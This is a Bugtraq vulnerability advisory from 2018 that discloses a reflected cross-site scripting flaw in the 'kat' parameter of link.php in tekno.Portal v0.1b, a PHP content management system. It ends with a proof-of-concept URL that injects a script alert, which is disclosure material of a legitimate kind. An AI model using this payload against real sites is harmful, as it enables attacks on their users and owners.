[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201809251551.w8PFpfgd012500@ip-100-122-153-233.us-east-1.ec2.aws.symcpe.net>
Date: Tue, 25 Sep 2018 15:51:41 GMT
From: Socket_0x03@...aexe.com
To: bugtraq@...urityfocus.com
Subject: tekno.Portal v0.1b - Cross-Site Scripting Vulnerability in "link.php"
         =====================================================================
         tekno.Portal v0.1b - Cross-Site Scripting Vulnerability in "link.php" 
         =====================================================================
____________________________________________________________________________________
 # Exploit Title: tekno.Portal v0.1b - Cross-Site Scripting Vulnerability in "link.php" 
 # Date: [09-25-2018]
 # Category: Webapps
____________________________________________________________________________________
 # Author: Socket_0x03 (Alvaro J. Gene)
 # Email: Socket_0x03 (at) teraexe (dot) com
 # Website: www.teraexe.com 
____________________________________________________________________________________
 # Software Link: http://sourceforge.net/projects/teknoportal
 # Vulnerable Application: tekno.Portal
 # Version: 0.1b
 # File: link.php
 # Parameter: kat
 # Language: This application is available only in turkish language.
 # Product Description: Tekno.Portal is a content management system (CMS) developed 
   in PHP; furthermore, a webmaster can use this application to manage files, store
   data, and more. 
   
____________________________________________________________________________________
 #  Cross-Site Scripting Vulnerability: 
 
   http://www.website.com/teknoportal/link.php?kat=<"Test">[XSS]
 # XSS Example: 
   http://www.website.com/teknoportal/link.php?kat=<"Test"><script>alert(23)</script>
____________________________________________________________________________________
Powered by blists - more mailing lists
 
